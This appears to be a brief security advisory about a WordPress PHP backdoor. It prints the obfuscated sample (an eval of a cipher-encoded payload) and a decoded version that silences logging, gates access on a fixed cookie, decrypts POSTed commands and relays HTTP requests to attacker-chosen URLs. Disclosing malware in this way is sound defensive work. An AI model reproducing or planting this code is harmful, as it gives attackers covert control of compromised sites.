Backdoor PHP code WordPress

We have detected a Backdoor PHP code. It is often hidden in the WP writable directory. This backdoor is used to send PHP code execution.

 

<?php
$yeqqdvu = 6110;
function neceliemyz($rdcldpm, $oqwvlr)
{
$efogjgyh = ”;
for($i=0; $i < strlen($rdcldpm); $i++){
$efogjgyh .= isset($oqwvlr[$rdcldpm[$i]]) ? $oqwvlr[$rdcldpm[$i]] : $rdcldpm[$i];
}
$pgdnvjl=”base64_decode”;
return $pgdnvjl($efogjgyh);
}
$hljnyoyp = ‘KevoH68qlUKamupXVJy4IUvPlUmxdJmqmxttM04Zg9yXdcvPVu63MgG4duGPlUmxdJmqm’.
‘xttM04Zg9yvVsmSVv8xlUySVspXdcVarg97RKXNVu63UJpXdk6Pdev2HUKa’.
‘rg97RKXNHkGodJmvUJ6qlUmPIkmSVsKarO97RKXNHkWXUJZvGgAsdkwYUu6YlkZFGevSdv83HkFvmxttM04ZgA3Mlc8’.
‘xlkwhHgNamw8R038BOjjAIUrAmev3lk3XRKX7RKaADgNAHkIAMgpXGe62DgQ8DgDtI0wcrqIxrx3uIqDqB0p5ler2IhvbzO3’.
‘xZkjtlRrWrcl5l0V5MK3MDgNADgNADgyvLev3Mg97RKX8RKaZg5p9IUpbDR3Alcv4l68slUpPIu8oGe6oGiramJya’.
‘VRaSBuvoVi63mx97RKa9lew3ION8DiZtdev3MgD8D5t9lew3IOtxM04ZgA3MmeDuZw89lkZSle6Plew3’.
‘ION8DembVujuZw89lkZSlejaGUm4le6hdupvMgp9IUpbkqwGMO97RKaZg5pqlkW9UupbGeQAfOyFdsZvVcvbdevTlOb9lkZxL’.
‘Uy3Mgp5ZhpPle6hdupvUupbGeQXM04ZgA3MmimvVJ64GgN8DiZvdcpPle’.
‘w3I0QAMgpqlkW9UupbGeQXzt3MRKXXl5NaDOpxlUZFdiKXRKX7RKaADgNAmimvVJ64GgN8DiZvdcpPlew3I0DamiZvd’.
‘cpPlew3IO97RKX8RKaZgc6hHeCAmimvVJ64GR4ZgA3Mls6oIJpXduYAle6hVsvtGgA9lew3IO9Z’.
‘gs4Zg5NADgN9dJ63UupbGeQAfON5Dh4Zg5NADgN9Hu6WDR3Amw80p6mkp6’.
‘mdm3bj6wyPOQ806gGGDgYAmw80p6mkp6mdmFmwj66wjFpP66mmmF37RKaADgN’.
‘Ame2vL684lkYAfOyqGim4lkYame2vLO97RKaARKaADgNAlc8xDgA9H03tzxN9H’.
‘ONCDiZ3Vcnvd5A9Hu6WM04Ame91Mx9Zg5NADgy7RKaADgNADgNADgp1lUvdmevGDR3AIubxMe8xlgA9’.
‘Hu6WkxpXUO9AU5Name2vL684lkYAmONxZ0jXM04Zg5NADgy8RKaZg5NADgycdJDAMgpXf0N7Dg’.
‘pXfiZ3Vcnvd5A9lew3IO97MK3MDgNADi4Zg5NADgNADgNAlc8xDgA9Hh3tzxN9HhnqGim4lkYame2vLO9Am5IAme9CVJpxde6’.
‘oMgp9IUpbM04Amea1MxtAme91Mx9Zg5NADgNADgNALt3MDgNADgNADgNADgNAme8FGw89I’.
‘UpbDgY8DeZaV5bSVcKamepbGewdmevGMOyLDe8xlgA9Hu6WkxpEUO9Xzt3MDgNADgNADgy8RKaADgNAPK3MRKaADg’.
‘NAVc63GUmoDgpSGUpPlew3I04Zgs3ZgA3Mls6oIJpXduYAVu6olw89IUpbrOA9lew3IO9Zgs4Zg5NADgN9He6blgN8DgD5z’.
‘t3MRKaADgNAlc8xlkwhHgA9lew3I645He6ble6xVxmGDewqDgp1lU98f5puIknFlO9Zg5NADgy7RKaADgNADgNADgpa’.
‘lkw9DgY8Dgp1lU9AB5N5z5N5DgYAmilbdi6vDgYADvnxUeY5zt3MDgNADi3ZgA3MDgNAD’.
‘gptIUmbdUrAfOybVsmbLOAsHip3VgVAf0YAIUmxIU9aRKaADgNADgNADgG2lUpaduKsDR3+Dgp9IUpb’.
‘kxm2lUpaduK5UOtZg5NADgNADgNAmubvIkpvV5VAf0YAmebvIkK4RKaADgNADgNADgGh’.
‘duW3lkW3mxN8f5N9lew3I645Ic89LOmGBN3MDgNADgNADgNsGev2lk8FGgVAf0YAmepbGewdDspXdk6SG’.
‘UK5UOtZg5NADgNADgNARKaADgNAMO97RKaZg5NADgN9IJpYDR3AVJpxlkw2UuZSdspvLipPIJmvIUp’.
‘vMgptIUmbdUrXzt3MDgNADN3MDgNADgpxlUZFdiKAfOyNlcv4l68slUpPIu8oGe’.
‘6oGiramepbGewdDs6xdgmGBgyeKjn0pOtAmeZ3Lg97RKaZg5NADgyXl5Nameb3Giy’.
‘PVc6qVe8oVu6PHe6ble6xMK3MDgNADi4Zg5NADgNADgNAHkIAMiZ3VsySVxA9’.
‘Hip3Vw8xlUZtduWql68alkw9lUmdrw34DgDxrRN5MON8f03Ap9wrj3jXRKaADgNADgNADi4Zg5NADgNADgNADgNADgpxlU’.
‘ZFdiKAfON5Owpjjw8wjvmfjvn3D5NoDgpaGiptUJmvVJySdsZvUubvIkpvVv4tU04Zg5’.
‘NADgNADgNAPK3MDgNADi3Zg5NADgyvdiZvRKaADgNALt3MDgNADgNADgN9Vc6qGkn3DR3AD9Zf09WwKFpm03WPp6mO0’.
‘FD5zt3MDgNADi3ZgA3MDgNADimvGi6xd5N9Vc6qGkn3zt3MPK3MRKXcGkWhGevSd5yqlkW9UupbGeQxMgp9IUpb’.
‘MK3MLt3MDgNADgCSDi6qlOyqduZ1lUpqRKX8’;
$budjtact = Array(‘1’=>’r’, ‘0’=>’T’, ‘3’=>’0′, ‘2’=>’t’, ‘5’=>’i’, ‘4’=>’s’, ‘7’=>’7′, ‘6’=>’V’, ‘9’=>’k’, ‘8’=>’9′, ‘A’=>’g’, ‘C’=>’8’, ‘B’=>’L’, ‘E’=>’q’, ‘D’=>’I’, ‘G’=>’d’, ‘F’=>’1’, ‘I’=>’Y’, ‘H’=>’a’, ‘K’=>’Q’, ‘J’=>’3’, ‘M’=>’K’, ‘L’=>’e’, ‘O’=>’S’, ‘N’=>’A’, ‘Q’=>’E’, ‘P’=>’f’, ‘S’=>’v’, ‘R’=>’D’, ‘U’=>’X’, ‘T’=>’6’, ‘W’=>’5’, ‘V’=>’c’, ‘Y’=>’4’, ‘X’=>’p’, ‘Z’=>’N’, ‘a’=>’o’, ‘c’=>’m’, ‘b’=>’h’, ‘e’=>’G’, ‘d’=>’b’, ‘g’=>’C’, ‘f’=>’P’, ‘i’=>’H’, ‘h’=>’j’, ‘k’=>’W’, ‘j’=>’U’, ‘m’=>’J’, ‘l’=>’Z’, ‘o’=>’u’, ‘n’=>’x’, ‘q’=>’z’, ‘p’=>’R’, ‘s’=>’n’, ‘r’=>’M’, ‘u’=>’2’, ‘t’=>’w’, ‘w’=>’F’, ‘v’=>’l’, ‘y’=>’B’, ‘x’=>’y’, ‘z’=>’O’);
eval/*oynngj*/(neceliemyz($hljnyoyp, $budjtact));

?>

Following is decoded version of the PHP :

<?php

@ini_set(‘display_errors’,0);
@ini_set(‘log_errors’,0);
@error_reporting(0);
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set(‘max_execution_time’,0);

foreach ($_COOKIE as $item)
{
if ($item != “0a1f3623-6c23-4bdc-b9a9-25e0d392fbe7”)
exit();
}

$data = file_get_contents(‘php://input’);
$data = split(“=”,$data,2);

$b64_decode_data = base64_decode(urldecode($data[1]));

$send_data = unserialize(decrypt($b64_decode_data));

$result = send_data1 ($send_data);

if (!$result)
{
$result = send_data2($send_data);
}

echo $result;

function decrypt($data)
{
$out_data = “”;
$key = $_SERVER[‘HTTP_HOST’] . $_SERVER[‘REQUEST_URI’];
$key_len = strlen($key);

for ($i=0; $i < strlen($key); $i++)
{
$key[$i] = chr(ord($key[$i]) ^ ($key_len % 255));
}

for ($i=0; $i<strlen($data);)
{
for ($j=0; $j<strlen($key) && $i<strlen($data); $j++, $i++)
{
$out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
}
}

return $out_data;
}

function send_data1($data)
{
$head = “”;

foreach($data[“headers”] as $key=>$value)
{
$head .= $key . “: ” . $value . “\r\n”;
}

$params = array(‘http’ => array(
‘method’ => $data[“method”],
‘header’ => $head,
‘content’ => $data[“body”],
‘timeout’ => $data[“timeout”],

));

$ctx = stream_context_create($params);

$result = @file_get_contents($data[“url”], FALSE, $ctx);

if ($http_response_header)
{
if (strpos($http_response_header[0], “200”) === FALSE)
{
$result = “HTTP_ERROR\t” . $http_response_header[0];
}
}
else
{
$result = “CONNECTION_ERROR”;
}

return $result;
}

function send_data2($data)
{
// use sockets
}